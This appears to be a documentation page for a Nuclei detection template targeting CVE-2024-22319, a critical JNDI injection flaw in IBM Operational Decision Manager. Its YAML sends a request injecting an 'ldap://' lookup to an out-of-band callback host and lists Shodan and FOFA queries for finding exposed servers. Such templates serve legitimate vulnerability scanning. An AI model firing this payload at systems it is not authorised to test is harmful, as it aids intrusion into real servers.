IBM Operational Decision Manager - JNDI Injection
ID: CVE-2024-22319
Severity: critical
Author: DhiyaneshDK
Tags: cve,cve2024,ibm,odm,decision-manager,jndi,jsf,rce
Description
Section titled “Description”IBM Operational Decision Manager 8.10.3, 8.10.4, 8.10.5.1, 8.11, 8.11.0.1, and 8.12.0.1 is susceptible to remote code execution attack via JNDI injection when passing an unchecked argument to a certain API. IBM X-Force ID: 279145.
YAML Source
Section titled “YAML Source”id: CVE-2024-22319
info: name: IBM Operational Decision Manager - JNDI Injection author: DhiyaneshDK severity: critical description: | IBM Operational Decision Manager 8.10.3, 8.10.4, 8.10.5.1, 8.11, 8.11.0.1, and 8.12.0.1 is susceptible to remote code execution attack via JNDI injection when passing an unchecked argument to a certain API. IBM X-Force ID: 279145. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2024-22319 cwe-id: CWE-74 epss-score: 0.29329 epss-percentile: 0.96896 cpe: cpe:2.3:a:ibm:operational_decision_manager:8.10.3:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: ibm product: operational_decision_manager shodan-query: - html:"IBM ODM" - http.html:"ibm odm" fofa-query: - title="IBM ODM" - title="ibm odm" - body="ibm odm" tags: cve,cve2024,ibm,odm,decision-manager,jndi,jsf,rce
http: - method: GET path: - "{{BaseURL}}/decisioncenter-api/v1/about?datasource=ldap://{{interactsh-url}}"
matchers: - type: dsl dsl: - contains(interactsh_protocol, "dns") - 'contains(header, "application/json")' - 'contains(body, "patchLevel\":")' - 'status_code == 200' condition: and# digest: 4b0a00483046022100d33869fd293f7bd95706212b988572e1895c3e8ab8dd6418f09562042a9bce7e02210086710c0d1a19de8aac4e131e03de6d1a277a33dbf3ef31d9f3c76de49dd60900:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-22319.yaml"